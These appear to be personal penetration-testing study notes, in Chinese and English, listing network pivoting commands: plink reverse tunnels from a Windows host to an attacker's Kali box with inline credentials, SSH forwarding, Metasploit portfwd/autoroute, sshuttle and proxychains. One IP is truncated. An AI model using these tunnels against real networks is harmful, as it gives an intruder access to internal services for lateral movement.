在ad上旋转 同本机。（windows） plink 192 : remote ip ``` plink.exe -ssh -l kali -pw ilak -R 192.168.159.44:1234:127.0.0.1:3306 192.168.159.44 cmd.exe /c echo y | plink.exe -ssh -l kali -pw ilak -R 192.168.:1234:127.0.0.1:3306 10.11.0.4 ``` linux的在tips里基本都有 本地端口转发 (单port) ``` sudo ssh -N -L 0.0.0.0:445:172.16.159.5:445 [email protected] 后面为本机 ``` 远程端口转发 (单port) ``` ssh -N -R 10.11.0.4:2221:127.0.0.1:3306 [email protected] ``` 动态转发 ``` sudo ssh -N -D 127.0.0.1:8080 [email protected] ``` ### msfconsole ``` portfwd add -l 3389 -p 3389 -r 192.168.1.110 ``` ``` 然后我使用 sshuttle -r [email protected]:22000 “另一个必要的命令”devdeptIPnetwork.0/24，我的 kali 回复我 “客户端：已连接” okey。 1. `sudo sshuttle -r [email protected] 172.16.CHANGEME.0/24 -v` ssh local in local kali //172 is remote windows, and 192 is my kali machine sudo ssh -N -L 0.0.0.0:445:172.16.124.5:445 [email protected] ssh remote in remote machine ssh -N -R 192.168.119.124:2221:127.0.0.1:3306 [email protected] ssh 动态转发 sudo ssh -N -D 127.0.0.1:8888 [email protected] \\注意为sock4 ``` ### msf autoroute ``` msf use multi/manage/autoroute use auxiliary/server/socks4a set srvhost 127.0.0.1 bash sudo bash -c 'echo "socks4 127.0.0.1 1080" >> /etc/proxychains.conf' proxychains rdesktop 192.168.120.10 ```